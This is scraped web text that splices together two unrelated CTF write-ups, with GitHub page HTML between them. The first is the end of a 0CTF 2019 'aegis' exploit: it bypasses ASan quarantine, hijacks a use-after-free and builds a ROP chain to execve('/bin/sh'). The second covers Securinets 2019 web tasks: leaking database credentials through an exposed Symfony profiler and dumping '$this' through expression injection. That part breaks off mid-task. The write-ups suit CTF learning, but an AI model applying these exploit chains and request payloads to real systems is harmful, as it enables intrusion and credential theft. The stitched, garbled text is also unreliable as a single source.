0x602000000010 is located 0 bytes inside of 16-byte region [0x602000000010,0x602000000020)freed by thread T0 here: #0 0x55555562f5f0 (/home/a/Desktop/0ctf_2019/aegis/aegis+0xdb5f0) #1 0x5555556688be (/home/a/Desktop/0ctf_2019/aegis/aegis+0x1148be) #2 0x555555668a7a (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114a7a) #3 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
previously allocated by thread T0 here: #0 0x55555562f7c0 (/home/a/Desktop/0ctf_2019/aegis/aegis+0xdb7c0) #1 0x555555668375 (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114375) #2 0x555555668a65 (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114a65) #3 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-use-after-free (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114552)Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00=>0x0c047fff8000: fa fa[fd]fd fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa faShadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb==4316==ABORTING
In order to attack this vulnerability, you need to null out the byte that ASAN has poisoned.In the above example, it is 0x0c047fff8002. ASAN does NOT use ASLR, so we can determine the addressof the poison byte we want to NULL out by either looking at the ASAN output, or doing a simple computation
ShadowAddr = (Addr >> 3) + Offset.
You can read more about ASAN at these two links:https://www.usenix.org/system/files/conference/atc12/atc12-final39.pdfhttps://github.com/google/sanitizers/wiki/AddressSanitizer
It turns out, this UAF is not very useful to us. Why? Well, let's take a look at ASAN's Heap:
ASAN Heap snapshot 1 (Before Free):00:0000│ 0x602000000000 ◂— 0x2ffffff0000000201:0008│ 0x602000000008 ◂— 0x208000012000001002:0010│ 0x602000000010 —▸ 0x60b0000000f0 ◂— 0x6161616161616161 ('aaaaaaaa')03:0018│ 0x602000000018 —▸ 0x555555668ab0 (cfi_check) ◂— jmp 0x555555667d1004:0020│ 0x602000000020 ◂— 0x0
ASAN Heap snapshot (After Free):00:0000│ 0x602000000000 ◂— 0x20000000000000301:0008│ 0x602000000008 ◂— 0x208000012000001002:0010│ 0x602000000010 —▸ 0x60b061000001 ◂— 0x003:0018│ 0x602000000018 —▸ 0x555555668ab0 (cfi_check) ◂— jmp 0x555555667d1004:0020│ 0x602000000020 ◂— 0x0
In this example, we've allocated a note of size 100. The pointer in the global Notes array will be 0x602000000010. This address simply contains a pointer to the note's data. However, you can see that after the free, this pointer become mangled!Thus, we are unable to reuse this dangling pointer to our advantage as the program will just segfault.
After this revelation, we continued to look for more vulnerabilities. It turns out, there is also a heapbuffer overflow in the update function. The update function uses strlen to read in new content, but it adds a byteto the amount of data that can be read in. Thus, if we do multiple successive updates, we can gradually overflow an object.
What can we actually attack with this overflow? Well, if we are clever about the size of our notes,the content chunks will be place on the same page as the chunks which contain pointers to the note content.For example, when we allocate a chunk of size 16, ASAN's heap will look like this:
00:0000│ 0x602000000000 ◂— 0x2ffffff0000000201:0008│ 0x602000000008 ◂— 0x90000012000001002:0010│ 0x602000000010 —▸ 0xa0061616161 ◂— 0x003:0018│ 0x602000000018 ◂— 0xbebebe000000000004:0020│ 0x602000000020 ◂— 0x2ffffff0000000205:0028│ 0x602000000028 ◂— 0x208000012000001006:0030│ 0x602000000030 —▸ 0x602000000010 —▸ 0xa0061616161 ◂— 0x007:0038│ 0x602000000038 —▸ 0x555555668ab0 (cfi_check) ◂— jmp 0x555555667d10
In this example, the chunk's content begins at 0x602000000010 and the chunk which contains a datapointer begins at 0x602000000020.
So, by using multiple updates to the same note, we can achieve an overflow of arbitrary length.However, we run into a problem. The addresses 0x602000000020 and 0x602000000028 have been poisonedby ASAN. Thus, if we want to write into one of them, we need to use the secret function and it'sone byte null overwrite. We only get to do this once, however, so we have no chance of directlymaking it to the data pointer located at 0x602000000030 because there are two poisoned addressesbetween our content and the pointer.
So, all we can attack with this overflow is the chunk's metadata. So what to they bytes located at 0x602000000020 and 0x2080000120000010 actually mean? Well, let's take a look at the ASAN allocator'ssource code located here:
https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_allocator.cc
I've pulled out two of the most important code sections for our purposes.
// The memory chunk allocated from the underlying allocator looks like this:// L L L L L L H H U U U U U U R R// L -- left redzone words (0 or more bytes)// H -- ChunkHeader (16 bytes), which is also a part of the left redzone.// U -- user memory.// R -- right redzone (0 or more bytes)// ChunkBase consists of ChunkHeader and other bytes that overlap with user// memory.
// If the left redzone is greater than the ChunkHeader size we store a magic// value in the first uptr word of the memory block and store the address of// ChunkBase in the next uptr.// M B L L L L L L L L L H H U U U U U U// | ^// ---------------------|// M -- magic value kAllocBegMagic// B -- address of ChunkHeader pointing to the first 'H'static const uptr kAllocBegMagic = 0xCC6E96B9;
struct ChunkHeader { // 1-st 8 bytes. u32 chunk_state : 8; // Must be first. u32 alloc_tid : 24;
u32 free_tid : 24; u32 from_memalign : 1; u32 alloc_type : 2; u32 rz_log : 3; u32 lsan_tag : 2; // 2-nd 8 bytes // This field is used for small sizes. For large sizes it is equal to // SizeClassMap::kMaxSize and the actual size is stored in the // SecondaryAllocator's metadata. u32 user_requested_size : 29; // align < 8 -> 0 // else -> log2(min(align, 512)) - 2 u32 user_requested_alignment_log : 3; u32 alloc_context_id;};
// Every chunk of memory allocated by this allocator can be in one of 3 states:// CHUNK_AVAILABLE: the chunk is in the free list and ready to be allocated.// CHUNK_ALLOCATED: the chunk is allocated and not yet freed.// CHUNK_QUARANTINE: the chunk was freed and put into quarantine zone.enum { CHUNK_AVAILABLE = 0, // 0 is the default value even if we didn't set it. CHUNK_ALLOCATED = 2, CHUNK_QUARANTINE = 3};
Okay, so we see that the first 29 bits of the data located at 0x602000000028 represent the chunks length. Also, the first 8 bits of the metadata determine whether the chunk is available, allocated, or in quarantine.
Before we continue, we have to go over a very important concept of ASAN's allocator. The allocatoris not designed to be hyper efficient, but to find bugs. Thus, it will try to avoid allocatingvalid memory over freed memory at all costs so it can catch bugs like UAF. It does this byputting free chunks into quarantine. Quarantined chunks are only reused after a certain amountof memory has been freed. The standard setting is quarantine_size_mb=256M which can be seenif you set the environment variable export ASAN_OPTIONS=verbosity=1. Thus, we need to freea HUGE amount of memory before it gets reused.
How do we do this with only 10 chunks with a maximum size of 1024? Answer: overwrite the sizeof the victim chunk with a HUGE number. From our experience, 0xffffff should do it.
Now we're cookin'. By overwriting the size of the next chunk with a huge number and setting the other metadata bytes properly, we can get a huge chunk of memory to be recycled.Thus, if we allocate some notes in this memory, we should be able to attack the UAFwe discovered before and gain arbitrary read write across the process's address space.
You might be wondering, how can we overwrite the size of the data located at 0x602000000028?Isn't it also poisoned? Answer: ASAN does not protect against non-qword aligned overwrite. Basically,we would have to write the address 0x602000000030 before ASAN would notice the overflow, since we nulledout the previous byte in shadow memory with the secret function.
Once we are able to set the data pointer of the first chunk we allocated, we can read and write the processaddress space as we please. However, the challenge isn't over. There is a check in the updatefunction that ensures your data pointer is located in ASAN's heap
if ( *(_QWORD *)data_pointer >> 44 != 6LL ) Thus, we only get one write for our exploit to work. Another problem is that the stack if full of junk and the only one_gadgets we have are these: 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)constraints: rcx == NULL
0x4f322 execve("/bin/sh", rsp+0x40, environ)constraints: [rsp+0x40] == NULL
0x10a38c execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
It is also very difficult to find a target which will be executed between our memory write and the call to error() where $RCX is null.
So, where can we write? Looking through the disassembly of the functions
_asan_handle_no_return_ubsan_handle_cfi_check_fail_abort
we see there is a call to __sanitizer::Die().
In this function, there is the code snippet:
if ( __sanitizer::UserDieCallback ) __sanitizer::UserDieCallback(this); v2 = &__sanitizer::InternalDieCallbacks; Thus, if there are any UserDieCallbacks registered, they will be executed. If we put one_gadget here, we will get the same issue. The stack is too full of junk for the rsp+X constraints to be passed. Looking at the registers when our gadget is called, we have the following state: ────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────── RAX 0x7ffff6ea0f05 (strsignal+165) ◂— mov rax, rbp RBX 0x555556504880 —▸ 0x5555556388b0 (__sanitizer::SuppressionContext::GetMatched(__sanitizer::InternalMmapVector<__sanitizer::Suppression*>*)+352) ◂— push rbp RCX 0x7fffffffe0a0 —▸ 0x7fffffffe150 ◂— 0x3d3d343300000003 RDX 0x7fffffffe0a0 —▸ 0x7fffffffe150 ◂— 0x3d3d343300000003 RDI 0x7fffffffe101 ◂— 0x100007fffffffe3 RSI 0x0 R8 0x6a6cb03abcebc041 R9 0x0 R10 0x0 R11 0x206 R12 0x55555556f8c0 (ptrace+7344) ◂— xor ebp, ebp R13 0x7fffffffe460 ◂— 0x1 R14 0x0 R15 0x0 RBP 0x555556504878 ◂— 0x0 RSP 0x7fffffffe2e0 ◂— 0x1 RIP 0x555555656148 ◂— call rax We also control the value at offset 8 in the stack shown below. 00:0000│ rsp 0x7fffffffe2e0 ◂— 0x101:0008│ 0x7fffffffe2e8 —▸ 0x7ffff6f0d398 (exec_comm+2520) ◂— lea rdi, [rip + 0xa9afb]02:0010│ 0x7fffffffe2f0 —▸ 0x7fffffffe320 —▸ 0x7fffffffe360 —▸ 0x7fffffffe380 —▸ 0x555555668ac0 ◂— ...03:0018│ 0x7fffffffe2f8 —▸ 0x555555667959 ◂— sub rsp, 804:0020│ 0x7fffffffe300 ◂— 0x105:0028│ 0x7fffffffe308 —▸ 0x55555566877e ◂— mov edi, dword ptr [rbp - 0x14]06:0030│ 0x7fffffffe310 —▸ 0x7fffffffe320 —▸ 0x7fffffffe360 —▸ 0x7fffffffe380 —▸ 0x555555668ac0 ◂— ...07:0038│ 0x7fffffffe318 —▸ 0x7fffffffe360 —▸ 0x7fffffffe380 —▸ 0x555555668ac0 ◂— push r15
So, RSI is already NULL and we need to set RDI to "/bin/sh" and RDX to NULL or environ for our exploit to work.Looking at the following one_gadget code
0x7ffff6f0d393 <exec_comm+2515>: lea rsi,[rsp+0x70]0x7ffff6f0d398 <exec_comm+2520>: lea rdi,[rip+0xa9afb] # 0x7ffff6fb6e9a0x7ffff6f0d39f <exec_comm+2527>: mov rdx,QWORD PTR [rax]0x7ffff6f0d3a2 <exec_comm+2530>: call 0x7ffff6ee7e30 <execve>
we see that it is possible to set rdx and rdi without changing rsi before execve is called.However, this requires setting the correct value in rax. rax must point to NULL, and the onlyother register that does this in the current state is rbp. Looking for a gadget in libc, we find
0x000000000009df05 : mov rax, rbp ; pop rbx ; pop rbp ; ret
This will set rax to rbp which points to NULL, pop twice, and return to the address on the stack which we control!
Thus, if we call this gadget using the UserDieCallbackand we only use the part of the one_gadget starting at 0x7ffff6f0d39f, we can call execve("/bin/sh", NULL, NULL)
Success!!! This will give us our shell and our flag!flag{ASan_and_CFI_absolute_defense}
Overall this challenge was definitely tough. I'd like to thank the CTForganizers for creating such a great challenge, it was very fun to pwn!
</div> </div> </div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# CTFSecurinets Quals 2019 WriteupThis repository serves as a writeup for CTFSecurinets Quals 2019
## Custom Location
**Category:** Web**Points:** 964**Author:** TheEmperors**Description:**
>Try to find out the database credentials.
>The author changed the location of some files to protect the web application from script kiddies.
>Link: https://web0.ctfsecurinets.com/
**Hint:**
> No hint.
### Write-upWhen you visit the task page, you will get this page
Nothing intresting.
Let's try visiting https://web0.ctfsecurinets.com/test
Now we can see an error page. It looks like we have much details as an error page. And it seems that it's based on php Symfony framework.
We try to click on one of the listed files under the error "NotFoundHttpException" text.
For example we try getting access to the link below
We find out that this page show the source code of one of the Symfony project files from this link:
>https://web0.ctfsecurinets.com/_profiler/open?file=vendor/symfony/http-kernel/EventListener/RouterListener.php&line=139#line139
After some tests I changed the URL to:
>https://web0.ctfsecurinets.com/_profiler/
And I was surprised that Symfony web profiler module was enabled. For persons that don't know what profiler is, it's a module that help developpers to debug code while development process. It's enabled on "dev" environnment.
Let's resume what we got, we have profiler enabled and we have to search about database credentials on web profiler configuration.
We get access to one of the logged requests
We go to configuration
And there we can find Symfony configuration
We get access to the "View full PHP configuration" link. But we got a blocking message
It looks like we should find database credentials without phpinfo.
Until now, this is the common solution. The purpose of the task was more difficult. There was only one solution until that the author found a non intending solution.
So I'm gonna start by explaining the non intending solution (easy one) before explaining the intendended solution.
#### Non intended solution (easy one)
This was very easy to find from Request/Response menu. Then, Server Parameters. And then DATABASE_URL variable
>"mysql://symfony_admin:Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}@127.0.0.1:3306/symfony_task"
So the flag is ``Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}``
#### Intended solution (real purpose the task and the hard one)
Because of the previous non intended solution, this intended solution will be very useless. But some teams managed to find this one and that was very smart.
So, I'm gonna explain it.
If we ignore the previous non intended solution, we will try to open the configuration file that contains the database password defined on Symfony project.
So if we return to the configuraion page from the profiler, we can find Symfony framework version
>Symfony 4.2.4
Now, after a quick search from Google, we find the configuration file that contains the database credentials for Symfony 4.2
>https://symfony.com/doc/4.2/best_practices/configuration.html
Then, we try to open `.env` file from the profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=.env
But it looks like that file was not found. And that's when we remember that task name is `Custom Location`. So that we need to find database credentials from a file that was moved to another location.
So how should we find it if we can only read files ?
Since framework configuration files are always available anywhere on the project, our solution was to download a Symfony project (4.2.4) and find out where .env file is loaded. Then we open that file on the Web Profiler on this task. And so we can read the new path of the .env file.
As a requirement, we need to install php 7.1 at least. Otherwise Symfony 3.4 will be installed. But nevermind since starting from Symfony 3.4, the project files tree is the same.
Now, we start searching for the .env file from all Symfony files except Test files, vendor directory (third party directory of any external module), and cache files `grep '\.env' * -R | grep -v Test | grep -v vendor | grep -v cache`
So, after opening all these files, we find that the only possible file that could load `.env` file is `config/bootstrap.php`
And that's how we are going to find out the real `.env` file from the Web Profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=config/bootstrap.php
So, the real `.env` file path is `secret_ctf_location/env`. We try to open it from the Web profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=secret_ctf_location/env
So the flag is `Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}`.___
## Trading values
**Category:** Web**Points:** 989**Author:** TheEmperors**Description:**
>N00B developers are an easy target. Try to exploit the application feature to get the hidden flag.
>Link: https://web1.ctfsecurinets.com/
**Hint (pinned on Web channel from Discord):**
>Hint 1: Trading values: It's a server side task
>Hint 2: Trading values: change request values as a hacker
>Hint 3: Trading values: For the last part of the task: try to find another one. You don't know it but it's known by everyone
### Write-up
After we opened the task link, we get this page with a dynamic line chart drawen on real time.
Reading the source code will not give us anything intresting: [index.html](resources/web-989-trading_values/inedx.html). Maybe because of the `Hint 1`.
So by inspecting Network Tab from the Browser (chrome) development tools (Ctrl+Maj+I, then go to Network Tab)
We can see there that each second a HTTP request is sent somewhere.
We inspect one of these requests. For example this one:
```https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values%5Bv1%5D=STC&values%5Bv2%5D=PLA&values%5Bv3%5D=SDF&values%5Bv4%5D=OCK```
We find the sent parameters request are
```formula: KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=values[v1]: STCvalues[v2]: PLAvalues[v3]: SDFvalues[v4]: OCK```
And the returned response is a random float number
The sent `formula` parameter was encoded using base64 base.
We decoded it and we got this result:
```(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg```
So the decoded request was
```formula: (v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avgvalues[v1]: STCvalues[v2]: PLAvalues[v3]: SDFvalues[v4]: OCK```
It seems like formula is using v1 attributes (mpk, drf, avg), v2 attributes (avg, mds, dmq), v3 attributes (pdi, rar, gdp, avg) and v4 attributes (mum, dad, avg).
We analyzed different HTTP request parameters and we figured out that formula changes (from Javascript when generating the request) but the concept is the same, the variables v1, v2, v3 and v4 are the same with the same attributes.
The hint 2 `change request values as a hacker` say that we need to change the formula or the values. But everytime we change the values[] value (not the key) we get a HTTP 500 error.
When we remove a values[] parameter (like `values[v4]=OCK`, we get an error that v4 was missing: `Variable "v4" is not valid around position 117 for expression `(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg`. Did you mean "v1"?`
We googled this error and we got an intresting result
It looks like this feature is based on ExpressionLanguage module from Symfony. So the backend project is a php one. And it's trying to compute that formula using those 4 values.
But how if we follow Hint 2 and remove some `values[]` parameters and we also remove those variables from the `formula` parameter and we only keep one variable ?
For example:
```formula: (v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)values[v1]: STC```
So the real parameters request will be (base64(`formula` parameter)):
```formula: KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpvalues[v1]: STC```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEp%3D&values%5Bv1%5D=STC
We also get a float result. This mean that the backend page is answering to this request correctly.
But how if if keep only v1 insteal of v.<attributes> ?
For example:
```formula: v1values[v1]: STC```
So the real parameters request will be (base64(`formula` parameter)):
```formula: djE=values[v1]: STC```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=djE=&values%5Bv1%5D=STC
We get another intresting result
We get the same thing when we replace `STC` by `OCK` or `SDF` or `PLA`:
Results (resume):
```For STC: object(App\Entity\STC)#233 (4) { ["id":"App\Entity\STC":private]=> NULL ["avg"]=> int(909) ["mpk"]=> int(100) ["drf"]=> int(48) }For OCK: object(App\Entity\OCK)#253 (4) { ["id":"App\Entity\OCK":private]=> NULL ["avg"]=> int(43) ["mum"]=> int(96) ["dad"]=> int(39) }For SDF: object(App\Entity\SDF)#252 (5) { ["id":"App\Entity\SDF":private]=> NULL ["avg"]=> int(328) ["pdi"]=> int(87) ["gdp"]=> int(11) ["rar"]=> int(85) }For PLA: object(App\Entity\PLA)#232 (4) { ["id":"App\Entity\PLA":private]=> NULL ["avg"]=> int(556) ["mds"]=> int(17) ["dmq"]=> int(74) }```
So what we talked about before (the v1, v2, v3 and v4 attributes) was correct. And we got a namespace path `(App\Entity\CLASS_NAME` which is related to Symfony (PHP).
But how this works ? We tried to substitute values[v1] value with many values but we always fail.
We read Hint 3 `Trading values: For the last part of the task: try to find another one. You don't know it but it's known by everyone`. This is the difficult part.
Because we don't know about WHAT the author is talking when he say `it`. Maybe is he talking about `values[v1]` value. Because this is what we can actuelly change.
We can't guess it whitout knowing what is `OCK` ? From the previous output, it's an object.
Is the backend page creating a new OCK object using this syntax ? `variable=new <out_input>()` and he is calling computing the formula using that variable ? or is it using `$OCK` variable like this `$<our_input>` ?
We followed the hint 3 and tested `values[v1]=__CLASS__` (to check if the code is going to call `new __CLASS()` to check the first theory. But, we got a blank page (a get a blank page also when we use a random values[v1] value). So this is not working.
Let's try to check the second theory (using a variable name). But we don't know any variable from the backend project.
And since we know that the backend application is based on PHP (Symfony) which is a Framework using classes (this is trivial when we saw namespaces from the object dump `App\Entity\CLASS_NAMES`), we figured out what does mean `Hint 3`. We need to google it and find any well known variable namees that we migh forget it actually but eveyone know it on Internet. And that's how we find the trivial local variable name `$this`.
So we try
```formula: v1values[v1]: this```
So the real parameters request will be (base64(`formula` parameter)):
```formula: djE=values[v1]: this```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=djE=&values%5Bv1%5D=this
And that's how we dump `$this` local variable from which we find the flag
A quick search we find the flag
So, the flag is `Securinets{T00_Ea5y_T0_U5e_This_Local_variable}`.___
## Unbreakable Uploader
**Category:** Web**Points:** 1000**Author:** TheEmperors**Description:**
>Find out the Mysql credentials and search the flag from the database.
>Link: https://web3.ctfsecurinets.com/
**Hint (pinned on Web channel from Discord):**
>Hint 1 for Unbreakable Uploader: try Action deny, target all on the begining
### Write-up
When we visit the task page we get this
We have two ways, trying to upload an Image file or trying to add or remove a restriction.
The second way seems useless actually.
So we tried to exploit an upload vulnerability but whatever my file, the application is very smart and detect my PHP files whatever my bypassing method even if I upload a PHP file renamed as a PNG file. Only JPEG and PNG files are allowed. And I think this is why the task was called `Unbreakable Uploader`.
So, maybe should we exploit another vulnerability from the second part of the task (Restrictions Form).
The first hint was to use Deny as an action and an `all` as a target. After that we opened an image
When, we opened an image, we get a Forbidden response
This means that our all IP address were denied.
It seems that there is an ACL feature to deny and allow targets.
